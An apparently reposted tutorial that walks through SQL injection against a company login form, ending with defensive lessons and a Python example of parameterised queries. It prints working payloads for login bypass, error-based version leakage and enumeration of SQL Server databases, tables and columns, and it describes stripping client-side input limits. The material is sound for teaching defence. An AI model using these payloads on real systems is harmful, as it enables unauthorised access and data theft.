
What is the in-depth analysis of the whole process of SQL injection

2025-03-26 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article walks through a complete SQL injection attack against a company login form, from bypassing authentication to enumerating databases, tables and columns, and closes with the defensive lessons. The whole process is analysed below.

Preliminary injection: bypass verification and log in directly

The login form of the company's website looks like this:

Besides the account name and password there is a third input box for the company name. From the layout of the form it is easy to infer the SQL behind it:

SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

The first two fields are checked, but the third input box is not; that is the hole. To start the injection, enter the following in the third input box:

Fill in any user name, leave the password blank, and click the login button: you are logged in.

Look at the final SQL and the reason is obvious:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1 --'

The first single quote in the input closes the Corp string, the trailing quote is commented out by "--", and in between sits the always-true condition 1=1, so whatever is typed logs in successfully. The harm of SQL injection does not stop at anonymous login.

Intermediate injection: obtaining information with the help of exceptions

Now write the following in the third input box:

' or 1 = (SELECT @@version)--


The SQL executed in the background becomes:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1 = (SELECT @@VERSION)--'

The WHERE condition now contains 1 = (SELECT @@VERSION).

Comparing the integer 1 with the nvarchar string that @@VERSION returns is guaranteed to raise an error, and that error is exactly what is wanted. After clicking log in, the page shows:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3)-10.0.5500.0 (X64) Sep 21 2011 22:45:45Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1)' to data type int.

Something serious has happened: the error message has leaked the server's operating system and SQL Server version.

Harm expansion: getting all database, table and field names from the server

Next, enter the following in the input box:

t' or 1 = (SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--

At this point the third input box turns out to have a limit on the number of characters, but a restriction enforced only in the client is effectively nonexistent: it can be removed directly in the Chrome browser.

Click to log in, and the information returned is as follows:

Conversion failed when converting the nvarchar value 'master' to data type int.

The exception reveals the database name "master". Increasing the number in the inner SELECT top n one step at a time returns the names of all the databases on the server.

Then enter the following:

B' or 1 = (SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--

The returned information is as follows:

Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.

We got the first table name in the master database: "spt_fallback_db".

As above, changing the number in turn yields all the table names in that database.

Now take the "spt_fallback_db" table as an example and try to get all the field names in it. Enter the following in the input box:

B' or 1 = (SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db')--

As a result, you get the following error prompt:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int."

This yields the first field name, "xserver_name"; all the field names can be walked through by changing the number in turn.

The ultimate goal: getting the data in the database

At this point we know that every database, table and field can be enumerated through SQL injection. To keep this article from becoming a pure injection tutorial, the code for retrieving the data itself is not shown; the point has been made. What does SQL injection mean? It means that all data in the database can be stolen.

When this harm is known, can anyone still ignore the SQL injection vulnerability?

Conclusion

With regard to security, the following points are summarised:

1. Always be vigilant about what the user enters.

2. Client-side validation alone is equivalent to no validation.

3. Never expose server error messages to users.

In addition, a few more points:

1. SQL injection can be achieved not only through input boxes but also through the URL.

2. Besides server error pages, there are other ways to obtain database information.

3. The injection can be automated with software, which steals information much faster than you might think.

4. The vulnerability has nothing to do with the language or platform.
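The login bypass from the first section and the three conclusion points, shown side by side as an added example that is not from the original article: a concatenated query in the shape of the page's SELECT, next to a hardened version that binds parameters, enforces the length limit on the server and hides database errors. The Users table, the sample row and the 64-character limit are constructed assumptions; sqlite3 stands in for SQL Server.

```python
import sqlite3

# Constructed in-memory stand-in for the site's login table; the real schema is unknown.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Name TEXT, Password TEXT, Corp TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 's3cret', 'ACME')")
    conn.commit()
    return conn

def login_vulnerable(conn, name, password, corp):
    # Same shape as the page's query: input is pasted into the SQL text, so a quote
    # in the Corp field closes the string and "--" comments out the rest.
    sql = (f"SELECT * FROM Users WHERE Name='{name}' "
           f"AND Password='{password}' AND Corp='{corp}'")
    return conn.execute(sql).fetchone() is not None

MAX_FIELD_LEN = 64  # assumed limit; enforced here on the server, not only in the browser

def login_safe(conn, name, password, corp):
    # Point 2: check lengths server-side, because the client-side limit can be removed.
    if any(len(v) > MAX_FIELD_LEN for v in (name, password, corp)):
        return False
    # Point 1: parameterised query. Values are bound separately from the SQL text, so
    # quotes, "--" and subqueries in the input are compared as plain strings.
    # (Password hashing is omitted; the point here is how the query is built.)
    sql = "SELECT * FROM Users WHERE Name=? AND Password=? AND Corp=?"
    return conn.execute(sql, (name, password, corp)).fetchone() is not None

def login_endpoint(conn, name, password, corp):
    # Point 3: database errors go to the server log; the user only sees a generic message.
    try:
        ok = login_safe(conn, name, password, corp)
    except sqlite3.Error as exc:
        print(f"[server log] database error: {exc}")  # log line, never part of the response
        return "Login failed"
    return "Welcome" if ok else "Login failed"

if __name__ == "__main__":
    db = make_db()
    bypass = ("anything", "", "' or 1=1 --")  # the page's bypass, typed into the Corp box
    print(login_vulnerable(db, *bypass))      # True: the input rewrites the query
    print(login_safe(db, *bypass))            # False: bound parameter, no such company
```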
